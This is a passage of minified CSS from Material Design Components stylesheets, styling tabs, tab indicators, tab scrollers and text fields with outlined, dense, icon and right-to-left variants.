0;-webkit-tap-highlight-color:rgba(0,0,0,0);position:absolute;top:0;left:0;width:100%;height:100%;overflow:hidden}.mdc-tab__ripple::before,.mdc-tab__ripple::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-tab__ripple::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-tab__ripple.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-tab__ripple.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-tab__ripple.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-tab__ripple.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-tab__ripple.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-tab__ripple::before,.mdc-tab__ripple::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-tab__ripple.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-tab__ripple::before,.mdc-tab__ripple::after{background-color:#3c7251}@supports not (-ms-ime-align: auto){.mdc-tab__ripple::before,.mdc-tab__ripple::after{background-color:var(--mdc-theme-primary, #3c7251)}}.mdc-tab__ripple:hover::before{opacity:.04}.mdc-tab__ripple:not(.mdc-ripple-upgraded):focus::before,.mdc-tab__ripple.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-tab__ripple:not(.mdc-ripple-upgraded)::after{transition:opacity 150ms linear}.mdc-tab__ripple:not(.mdc-ripple-upgraded):active::after{transition-duration:75ms;opacity:.12}.mdc-tab__ripple.mdc-ripple-upgraded{--mdc-ripple-fg-opacity: 0.12}.mdc-tab__content{position:relative;display:flex;align-items:center;justify-content:center;height:inherit;pointer-events:none}.mdc-tab__text-label,.mdc-tab__icon{transition:150ms color linear,150ms opacity linear;z-index:2}.mdc-tab__text-label{display:inline-block;opacity:.6;line-height:1}.mdc-tab__icon{width:24px;height:24px;opacity:.54;font-size:24px}.mdc-tab--stacked{height:72px}.mdc-tab--stacked .mdc-tab__content{flex-direction:column;align-items:center;justify-content:space-between}.mdc-tab--stacked .mdc-tab__icon{padding-top:12px}.mdc-tab--stacked .mdc-tab__text-label{padding-bottom:16px}.mdc-tab--active .mdc-tab__text-label{color:#3c7251;color:var(--mdc-theme-primary, #3c7251)}.mdc-tab--active .mdc-tab__icon{color:#3c7251;color:var(--mdc-theme-primary, #3c7251);fill:currentColor}.mdc-tab--active .mdc-tab__text-label,.mdc-tab--active .mdc-tab__icon{transition-delay:100ms;opacity:1}.mdc-tab:not(.mdc-tab--stacked) .mdc-tab__icon+.mdc-tab__text-label{padding-left:8px;padding-right:0}[dir=rtl] .mdc-tab:not(.mdc-tab--stacked) .mdc-tab__icon+.mdc-tab__text-label,.mdc-tab:not(.mdc-tab--stacked) .mdc-tab__icon+.mdc-tab__text-label[dir=rtl]{padding-left:0;padding-right:8px}.mdc-tab-bar{width:100%}.mdc-tab-indicator{display:flex;position:absolute;top:0;left:0;width:100%;height:100%;pointer-events:none;z-index:1}.mdc-tab-indicator>.mdc-tab-indicator__content--underline{background-color:#3c7251;background-color:var(--mdc-theme-primary, #3c7251)}.mdc-tab-indicator>.mdc-tab-indicator__content--underline{height:2px}.mdc-tab-indicator>.mdc-tab-indicator__content--icon{color:#446199;color:var(--mdc-theme-secondary, #446199)}.mdc-tab-indicator>.mdc-tab-indicator__content--icon{height:34px;font-size:34px}.mdc-tab-indicator__content{transform-origin:left;opacity:0}.mdc-tab-indicator__content--underline{align-self:flex-end;width:100%}.mdc-tab-indicator__content--icon{align-self:center;margin:0 auto}.mdc-tab-indicator--active>.mdc-tab-indicator__content{opacity:1}.mdc-tab-indicator>.mdc-tab-indicator__content{transition:250ms transform cubic-bezier(0.4, 0, 0.2, 1)}.mdc-tab-indicator--no-transition>.mdc-tab-indicator__content{transition:none}.mdc-tab-indicator--fade>.mdc-tab-indicator__content{transition:150ms opacity linear}.mdc-tab-indicator--active.mdc-tab-indicator--fade>.mdc-tab-indicator__content{transition-delay:100ms}.mdc-tab-scroller{overflow-y:hidden}.mdc-tab-scroller__test{position:absolute;top:-9999px;width:100px;height:100px;overflow-x:scroll}.mdc-tab-scroller__scroll-area{-webkit-overflow-scrolling:touch;display:flex;overflow-x:hidden}.mdc-tab-scroller__scroll-area::-webkit-scrollbar,.mdc-tab-scroller__test::-webkit-scrollbar{display:none}.mdc-tab-scroller__scroll-area--scroll{overflow-x:scroll}.mdc-tab-scroller__scroll-content{position:relative;display:flex;flex:1 0 auto;transform:none;will-change:transform}.mdc-tab-scroller--align-start .mdc-tab-scroller__scroll-content{justify-content:flex-start}.mdc-tab-scroller--align-end .mdc-tab-scroller__scroll-content{justify-content:flex-end}.mdc-tab-scroller--align-center .mdc-tab-scroller__scroll-content{justify-content:center}.mdc-tab-scroller--animating .mdc-tab-scroller__scroll-area{-webkit-overflow-scrolling:auto}.mdc-tab-scroller--animating .mdc-tab-scroller__scroll-content{transition:250ms transform cubic-bezier(0.4, 0, 0.2, 1)}.mdc-text-field--with-leading-icon .mdc-text-field__icon,.mdc-text-field--with-trailing-icon .mdc-text-field__icon{position:absolute;bottom:16px;cursor:pointer}.mdc-text-field__icon:not([tabindex]),.mdc-text-field__icon[tabindex="-1"]{cursor:default;pointer-events:none}.mdc-text-field-helper-text{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.75rem;line-height:1.25rem;font-weight:400;letter-spacing:.0333333333em;text-decoration:inherit;text-transform:inherit;display:block;margin-top:0;line-height:normal;margin:0;transition:opacity 150ms cubic-bezier(0.4, 0, 0.2, 1);opacity:0;will-change:opacity}.mdc-text-field-helper-text::before{display:inline-block;width:0;height:16px;content:"";vertical-align:0}.mdc-text-field-helper-text--persistent{transition:none;opacity:1;will-change:initial}.mdc-text-field-helper-text{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.75rem;line-height:1.25rem;font-weight:400;letter-spacing:.0333333333em;text-decoration:inherit;text-transform:inherit;display:block;margin-top:0;line-height:normal;margin:0;transition:opacity 150ms cubic-bezier(0.4, 0, 0.2, 1);opacity:0;will-change:opacity}.mdc-text-field-helper-text::before{display:inline-block;width:0;height:16px;content:"";vertical-align:0}.mdc-text-field-helper-text--persistent{transition:none;opacity:1;will-change:initial}.mdc-text-field-character-counter{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:.75rem;line-height:1.25rem;font-weight:400;letter-spacing:.0333333333em;text-decoration:inherit;text-transform:inherit;display:block;margin-top:0;line-height:normal;margin-left:auto;margin-right:0;padding-left:16px;padding-right:0;white-space:nowrap}.mdc-text-field-character-counter::before{display:inline-block;width:0;height:16px;content:"";vertical-align:0}[dir=rtl] .mdc-text-field-character-counter,.mdc-text-field-character-counter[dir=rtl]{margin-left:0;margin-right:auto}[dir=rtl] .mdc-text-field-character-counter,.mdc-text-field-character-counter[dir=rtl]{padding-left:0;padding-right:16px}.mdc-text-field--with-leading-icon .mdc-text-field__icon,.mdc-text-field--with-trailing-icon .mdc-text-field__icon{position:absolute;bottom:16px;cursor:pointer}.mdc-text-field__icon:not([tabindex]),.mdc-text-field__icon[tabindex="-1"]{cursor:default;pointer-events:none}.mdc-text-field{--mdc-ripple-fg-size: 0;--mdc-ripple-left: 0;--mdc-ripple-top: 0;--mdc-ripple-fg-scale: 1;--mdc-ripple-fg-translate-end: 0;--mdc-ripple-fg-translate-start: 0;-webkit-tap-highlight-color:rgba(0,0,0,0);border-radius:4px 4px 0 0;display:inline-flex;position:relative;box-sizing:border-box;height:56px;overflow:hidden;will-change:opacity,transform,color}.mdc-text-field::before,.mdc-text-field::after{position:absolute;border-radius:50%;opacity:0;pointer-events:none;content:""}.mdc-text-field::before{transition:opacity 15ms linear,background-color 15ms linear;z-index:1}.mdc-text-field.mdc-ripple-upgraded::before{transform:scale(var(--mdc-ripple-fg-scale, 1))}.mdc-text-field.mdc-ripple-upgraded::after{top:0;left:0;transform:scale(0);transform-origin:center center}.mdc-text-field.mdc-ripple-upgraded--unbounded::after{top:var(--mdc-ripple-top, 0);left:var(--mdc-ripple-left, 0)}.mdc-text-field.mdc-ripple-upgraded--foreground-activation::after{animation:mdc-ripple-fg-radius-in 225ms forwards,mdc-ripple-fg-opacity-in 75ms forwards}.mdc-text-field.mdc-ripple-upgraded--foreground-deactivation::after{animation:mdc-ripple-fg-opacity-out 150ms;transform:translate(var(--mdc-ripple-fg-translate-end, 0)) scale(var(--mdc-ripple-fg-scale, 1))}.mdc-text-field::before,.mdc-text-field::after{background-color:rgba(0,0,0,.87)}.mdc-text-field:hover::before{opacity:.04}.mdc-text-field:not(.mdc-ripple-upgraded):focus::before,.mdc-text-field.mdc-ripple-upgraded--background-focused::before{transition-duration:75ms;opacity:.12}.mdc-text-field::before,.mdc-text-field::after{top:calc(50% - 100%);left:calc(50% - 100%);width:200%;height:200%}.mdc-text-field.mdc-ripple-upgraded::after{width:var(--mdc-ripple-fg-size, 100%);height:var(--mdc-ripple-fg-size, 100%)}.mdc-text-field:not(.mdc-text-field--disabled) .mdc-floating-label{color:rgba(3,14,7,.32)}.mdc-text-field:not(.mdc-text-field--disabled) .mdc-text-field__input{color:rgba(0,0,0,.87)}.mdc-text-field .mdc-text-field__input{caret-color:#3c7251;caret-color:var(--mdc-theme-primary, #3c7251)}.mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--outlined):not(.mdc-text-field--textarea) .mdc-text-field__input{border-bottom-color:rgba(0,0,0,.42)}.mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--outlined):not(.mdc-text-field--textarea) .mdc-text-field__input:hover{border-bottom-color:rgba(0,0,0,.87)}.mdc-text-field .mdc-line-ripple{background-color:#3c7251;background-color:var(--mdc-theme-primary, #3c7251)}.mdc-text-field:not(.mdc-text-field--disabled):not(.mdc-text-field--textarea){border-bottom-color:rgba(0,0,0,.12)}.mdc-text-field:not(.mdc-text-field--disabled)+.mdc-text-field-helper-line .mdc-text-field-helper-text{color:rgba(0,0,0,.6)}.mdc-text-field:not(.mdc-text-field--disabled) .mdc-text-field-character-counter,.mdc-text-field:not(.mdc-text-field--disabled)+.mdc-text-field-helper-line .mdc-text-field-character-counter{color:rgba(0,0,0,.6)}.mdc-text-field:not(.mdc-text-field--disabled) .mdc-text-field__icon{color:rgba(0,0,0,.54)}.mdc-text-field:not(.mdc-text-field--disabled){background-color:#f5f5f5}.mdc-text-field .mdc-floating-label{left:16px;right:initial;top:18px;pointer-events:none}[dir=rtl] .mdc-text-field .mdc-floating-label,.mdc-text-field .mdc-floating-label[dir=rtl]{left:initial;right:16px}.mdc-text-field--textarea .mdc-floating-label{left:4px;right:initial}[dir=rtl] .mdc-text-field--textarea .mdc-floating-label,.mdc-text-field--textarea .mdc-floating-label[dir=rtl]{left:initial;right:4px}.mdc-text-field--outlined .mdc-floating-label{left:4px;right:initial;top:17px}[dir=rtl] .mdc-text-field--outlined .mdc-floating-label,.mdc-text-field--outlined .mdc-floating-label[dir=rtl]{left:initial;right:4px}.mdc-text-field--outlined--with-leading-icon .mdc-floating-label{left:36px;right:initial}[dir=rtl] .mdc-text-field--outlined--with-leading-icon .mdc-floating-label,.mdc-text-field--outlined--with-leading-icon .mdc-floating-label[dir=rtl]{left:initial;right:36px}.mdc-text-field--outlined--with-leading-icon .mdc-floating-label--float-above{left:40px;right:initial}[dir=rtl] .mdc-text-field--outlined--with-leading-icon .mdc-floating-label--float-above,.mdc-text-field--outlined--with-leading-icon .mdc-floating-label--float-above[dir=rtl]{left:initial;right:40px}.mdc-text-field__input{font-family:"Google Sans Text","Helvetica Neue",Helvetica,Arial,sans-serif;-moz-osx-font-smoothing:grayscale;-webkit-font-smoothing:antialiased;font-size:14px;line-height:1.75rem;font-weight:400;letter-spacing:.009375em;text-decoration:inherit;text-transform:inherit;align-self:flex-end;box-sizing:border-box;width:100%;height:100%;padding:20px 16px 6px;transition:opacity 150ms cubic-bezier(0.4, 0, 0.2, 1);border:none;border-bottom:1px solid;border-radius:0;background:none;appearance:none}.mdc-text-field__input::placeholder{transition:opacity 67ms cubic-bezier(0.4, 0, 0.2, 1);opacity:0;color:rgba(3,14,7,.32)}.mdc-text-field--fullwidth .mdc-text-field__input::placeholder,.mdc-text-field--no-label .mdc-text-field__input::placeholder,.mdc-text-field--focused .mdc-text-field__input::placeholder{transition-delay:40ms;transition-duration:110ms;opacity:1}.mdc-text-field__input:focus{outline:none}.mdc-text-field__input:invalid{box-shadow:none}.mdc-text-field__input:-webkit-autofill{z-index:auto !important}.mdc-text-field--no-label:not(.mdc-text-field--outlined):not(.mdc-text-field--textarea) .mdc-text-field__input{padding-top:16px;padding-bottom:16px}.mdc-text-field__input:-webkit-autofill+.mdc-floating-label{transform:translateY(-50%) scale(0.75);cursor:auto}.mdc-text-field--outlined{border:none;overflow:visible}.mdc-text-field--outlined:not(.mdc-text-field--disabled) .mdc-notched-outline__leading,.mdc-text-field--outlined:not(.mdc-text-field--disabled) .mdc-notched-outline__notch,.mdc-text-field--outlined:not(.mdc-text-field--disabled) .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.38)}.mdc-text-field--outlined:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--outlined:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--outlined:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__input:hover~.mdc-notched-outline .mdc-notched-outline__trailing,.mdc-text-field--outlined:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--outlined:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__notch,.mdc-text-field--outlined:not(.mdc-text-field--disabled):not(.mdc-text-field--focused) .mdc-text-field__icon:hover~.mdc-notched-outline .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.87)}.mdc-text-field--outlined:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__leading,.mdc-text-field--outlined:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__notch,.mdc-text-field--outlined:not(.mdc-text-field--disabled).mdc-text-field--focused .mdc-notched-outline__trailing{border-color:#3c7251;border-color:var(--mdc-theme-primary, #3c7251)}.mdc-text-field--outlined .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined 250ms 1}.mdc-text-field--outlined .mdc-notched-outline .mdc-notched-outline__leading{border-radius:4px 0 0 4px}[dir=rtl] .mdc-text-field--outlined .mdc-notched-outline .mdc-notched-outline__leading,.mdc-text-field--outlined .mdc-notched-outline .mdc-notched-outline__leading[dir=rtl]{border-radius:0 4px 4px 0}.mdc-text-field--outlined .mdc-notched-outline .mdc-notched-outline__trailing{border-radius:0 4px 4px 0}[dir=rtl] .mdc-text-field--outlined .mdc-notched-outline .mdc-notched-outline__trailing,.mdc-text-field--outlined .mdc-notched-outline .mdc-notched-outline__trailing[dir=rtl]{border-radius:4px 0 0 4px}.mdc-text-field--outlined .mdc-floating-label--float-above{transform:translateY(-144%) scale(1)}.mdc-text-field--outlined .mdc-floating-label--float-above{font-size:.75rem}.mdc-text-field--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-130%) scale(0.75)}.mdc-text-field--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-text-field--outlined::before,.mdc-text-field--outlined::after{content:none}.mdc-text-field--outlined:not(.mdc-text-field--disabled){background-color:transparent}.mdc-text-field--outlined .mdc-text-field__input{display:flex;padding:12px 16px 14px;border:none !important;background-color:transparent;z-index:1}.mdc-text-field--outlined .mdc-text-field__icon{z-index:2}.mdc-text-field--outlined.mdc-text-field--focused .mdc-notched-outline__leading,.mdc-text-field--outlined.mdc-text-field--focused .mdc-notched-outline__notch,.mdc-text-field--outlined.mdc-text-field--focused .mdc-notched-outline__trailing{border-width:2px}.mdc-text-field--outlined.mdc-text-field--disabled{background-color:transparent}.mdc-text-field--outlined.mdc-text-field--disabled .mdc-notched-outline__leading,.mdc-text-field--outlined.mdc-text-field--disabled .mdc-notched-outline__notch,.mdc-text-field--outlined.mdc-text-field--disabled .mdc-notched-outline__trailing{border-color:rgba(0,0,0,.06)}.mdc-text-field--outlined.mdc-text-field--disabled .mdc-text-field__input{border-bottom:none}.mdc-text-field--outlined.mdc-text-field--dense{height:48px}.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--float-above{transform:translateY(-134%) scale(1)}.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--float-above{font-size:.8rem}.mdc-text-field--outlined.mdc-text-field--dense.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--outlined.mdc-text-field--dense .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-120%) scale(0.8)}.mdc-text-field--outlined.mdc-text-field--dense.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--outlined.mdc-text-field--dense .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined-dense 250ms 1}.mdc-text-field--outlined.mdc-text-field--dense .mdc-text-field__input{padding:12px 12px 7px}.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label{top:14px}.mdc-text-field--outlined.mdc-text-field--dense .mdc-text-field__icon{top:12px}.mdc-text-field--with-leading-icon .mdc-text-field__icon{left:16px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon .mdc-text-field__icon,.mdc-text-field--with-leading-icon .mdc-text-field__icon[dir=rtl]{left:initial;right:16px}.mdc-text-field--with-leading-icon .mdc-text-field__input{padding-left:48px;padding-right:16px}[dir=rtl] .mdc-text-field--with-leading-icon .mdc-text-field__input,.mdc-text-field--with-leading-icon .mdc-text-field__input[dir=rtl]{padding-left:16px;padding-right:48px}.mdc-text-field--with-leading-icon .mdc-floating-label{left:48px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon .mdc-floating-label,.mdc-text-field--with-leading-icon .mdc-floating-label[dir=rtl]{left:initial;right:48px}.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-text-field__icon{left:16px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-text-field__icon,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-text-field__icon[dir=rtl]{left:initial;right:16px}.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-text-field__input{padding-left:48px;padding-right:16px}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-text-field__input,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-text-field__input[dir=rtl]{padding-left:16px;padding-right:48px}.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label--float-above{transform:translateY(-144%) translateX(-32px) scale(1)}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label--float-above[dir=rtl]{transform:translateY(-144%) translateX(32px) scale(1)}.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label--float-above{font-size:.75rem}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-130%) translateX(-32px) scale(0.75)}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above[dir=rtl],[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above[dir=rtl]{transform:translateY(-130%) translateX(32px) scale(0.75)}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined-leading-icon 250ms 1}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label--shake,.mdc-text-field--with-leading-icon.mdc-text-field--outlined[dir=rtl] .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined-leading-icon-rtl 250ms 1}.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label{left:36px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label,.mdc-text-field--with-leading-icon.mdc-text-field--outlined .mdc-floating-label[dir=rtl]{left:initial;right:36px}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--float-above{transform:translateY(-134%) translateX(-21px) scale(1)}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--float-above[dir=rtl]{transform:translateY(-134%) translateX(21px) scale(1)}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--float-above{font-size:.8rem}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-notched-outline--upgraded .mdc-floating-label--float-above{transform:translateY(-120%) translateX(-21px) scale(0.8)}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense.mdc-notched-outline--upgraded .mdc-floating-label--float-above[dir=rtl],[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-notched-outline--upgraded .mdc-floating-label--float-above[dir=rtl]{transform:translateY(-120%) translateX(21px) scale(0.8)}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense.mdc-notched-outline--upgraded .mdc-floating-label--float-above,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-notched-outline--upgraded .mdc-floating-label--float-above{font-size:1rem}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined-leading-icon-dense 250ms 1}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label--shake,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense[dir=rtl] .mdc-floating-label--shake{animation:mdc-floating-label-shake-float-above-text-field-outlined-leading-icon-dense-rtl 250ms 1}.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label{left:32px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label,.mdc-text-field--with-leading-icon.mdc-text-field--outlined.mdc-text-field--dense .mdc-floating-label[dir=rtl]{left:initial;right:32px}.mdc-text-field--with-trailing-icon .mdc-text-field__icon{left:initial;right:12px}[dir=rtl] .mdc-text-field--with-trailing-icon .mdc-text-field__icon,.mdc-text-field--with-trailing-icon .mdc-text-field__icon[dir=rtl]{left:12px;right:initial}.mdc-text-field--with-trailing-icon .mdc-text-field__input{padding-left:16px;padding-right:48px}[dir=rtl] .mdc-text-field--with-trailing-icon .mdc-text-field__input,.mdc-text-field--with-trailing-icon .mdc-text-field__input[dir=rtl]{padding-left:48px;padding-right:16px}.mdc-text-field--with-trailing-icon.mdc-text-field--outlined .mdc-text-field__icon{left:initial;right:16px}[dir=rtl] .mdc-text-field--with-trailing-icon.mdc-text-field--outlined .mdc-text-field__icon,.mdc-text-field--with-trailing-icon.mdc-text-field--outlined .mdc-text-field__icon[dir=rtl]{left:16px;right:initial}.mdc-text-field--with-trailing-icon.mdc-text-field--outlined .mdc-text-field__input{padding-left:16px;padding-right:48px}[dir=rtl] .mdc-text-field--with-trailing-icon.mdc-text-field--outlined .mdc-text-field__input,.mdc-text-field--with-trailing-icon.mdc-text-field--outlined .mdc-text-field__input[dir=rtl]{padding-left:48px;padding-right:16px}.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__icon{left:16px;right:auto}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__icon,.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__icon[dir=rtl]{left:auto;right:16px}.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__icon~.mdc-text-field__icon{right:12px;left:auto}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__icon~.mdc-text-field__icon,.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__icon~.mdc-text-field__icon[dir=rtl]{right:auto;left:12px}.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__input{padding-left:48px;padding-right:48px}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__input,.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon .mdc-text-field__input[dir=rtl]{padding-left:48px;padding-right:48px}.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__icon,.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon{bottom:16px;transform:scale(0.8)}.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__icon{left:12px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__icon,.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__icon[dir=rtl]{left:initial;right:12px}.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__input{padding-left:44px;padding-right:16px}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__input,.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-text-field__input[dir=rtl]{padding-left:16px;padding-right:44px}.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-floating-label{left:44px;right:initial}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-floating-label,.mdc-text-field--with-leading-icon.mdc-text-field--dense .mdc-floating-label[dir=rtl]{left:initial;right:44px}.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon{left:initial;right:12px}[dir=rtl] .mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon,.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon[dir=rtl]{left:12px;right:initial}.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__input{padding-left:16px;padding-right:44px}[dir=rtl] .mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__input,.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__input[dir=rtl]{padding-left:44px;padding-right:16px}.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon{left:12px;right:auto}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon,.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon[dir=rtl]{left:auto;right:12px}.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon~.mdc-text-field__icon{right:12px;left:auto}[dir=rtl] .mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense .mdc-text-field__icon~.mdc-text-field__icon,.mdc-text-field--with-leading-icon.mdc-text-field--with-trailing-icon.mdc-text-field--dense 